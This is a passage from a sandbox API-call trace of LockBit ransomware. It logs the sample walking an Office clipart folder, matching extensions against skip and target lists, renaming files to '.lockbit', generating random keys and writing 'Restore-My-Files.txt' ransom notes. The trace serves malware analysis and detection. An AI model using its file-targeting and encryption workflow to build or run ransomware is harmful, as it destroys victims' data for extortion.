lstrcmpiW (lpString1="iconcache.db", lpString2="J0107308.WMF") returned -1 [0141.593] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.593] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned=".WMF" [0141.593] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.594] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.594] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.595] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.595] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF.lockbit") returned 72 [0141.595] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.595] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.596] malloc (_Size=0x40068) returned 0x3e70008 [0141.596] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=15888) returned 1 [0141.596] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.596] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0141.596] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.597] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0141.597] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0141.602] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.602] malloc (_Size=0xa6) returned 0x77d7a8 [0141.602] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.603] free (_Block=0x77d7a8) [0141.603] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.603] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.603] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.603] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56393f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2a64, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107314.WMF", cAlternateFileName="")) returned 1 [0141.603] lstrcmpiW (lpString1=".", lpString2="J0107314.WMF") returned -1 [0141.603] lstrcmpiW (lpString1="..", lpString2="J0107314.WMF") returned -1 [0141.603] PathFindExtensionW (pszPath="J0107314.WMF") returned=".WMF" [0141.603] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.603] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.603] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.603] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.603] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.603] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.603] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.603] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.603] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.603] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.604] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.604] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.605] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107314.WMF") returned 1 [0141.605] lstrcmpiW (lpString1="ntldr", lpString2="J0107314.WMF") returned 1 [0141.605] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107314.WMF") returned 1 [0141.605] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107314.WMF") returned -1 [0141.605] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107314.WMF") returned -1 [0141.605] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107314.WMF") returned 1 [0141.606] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107314.WMF") returned -1 [0141.606] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.606] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned=".WMF" [0141.606] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.606] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.606] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.607] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.607] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.607] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.607] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.607] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.607] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.607] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.607] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.607] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.607] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF.lockbit") returned 72 [0141.607] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0141.608] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.608] malloc (_Size=0x40068) returned 0x3df0008 [0141.608] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10852) returned 1 [0141.608] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.608] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.609] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.609] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.609] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.614] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.614] malloc (_Size=0xa6) returned 0x77d7a8 [0141.614] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.615] free (_Block=0x77d7a8) [0141.615] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.615] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.615] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.615] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56393f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2c18, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107316.WMF", cAlternateFileName="")) returned 1 [0141.619] lstrcmpiW (lpString1=".", lpString2="J0107316.WMF") returned -1 [0141.619] lstrcmpiW (lpString1="..", lpString2="J0107316.WMF") returned -1 [0141.619] PathFindExtensionW (pszPath="J0107316.WMF") returned=".WMF" [0141.619] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.620] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.621] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.621] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.622] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.622] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.622] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107316.WMF") returned 1 [0141.622] lstrcmpiW (lpString1="ntldr", lpString2="J0107316.WMF") returned 1 [0141.622] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107316.WMF") returned 1 [0141.622] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107316.WMF") returned -1 [0141.622] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107316.WMF") returned -1 [0141.622] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107316.WMF") returned 1 [0141.622] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107316.WMF") returned -1 [0141.622] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.622] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned=".WMF" [0141.622] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.622] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.622] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.622] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.622] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.622] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.622] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.622] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.622] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.622] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.623] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.623] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF.lockbit") returned 72 [0141.623] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107316.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0141.625] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.626] malloc (_Size=0x40068) returned 0x3ef0008 [0141.626] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=11288) returned 1 [0141.626] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.626] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0141.626] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.627] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0141.627] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0141.629] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.629] malloc (_Size=0xa6) returned 0x77d7a8 [0141.629] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.631] free (_Block=0x77d7a8) [0141.631] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.631] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.631] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.631] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56393f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1984, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107328.WMF", cAlternateFileName="")) returned 1 [0141.632] lstrcmpiW (lpString1=".", lpString2="J0107328.WMF") returned -1 [0141.632] lstrcmpiW (lpString1="..", lpString2="J0107328.WMF") returned -1 [0141.632] PathFindExtensionW (pszPath="J0107328.WMF") returned=".WMF" [0141.632] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.632] 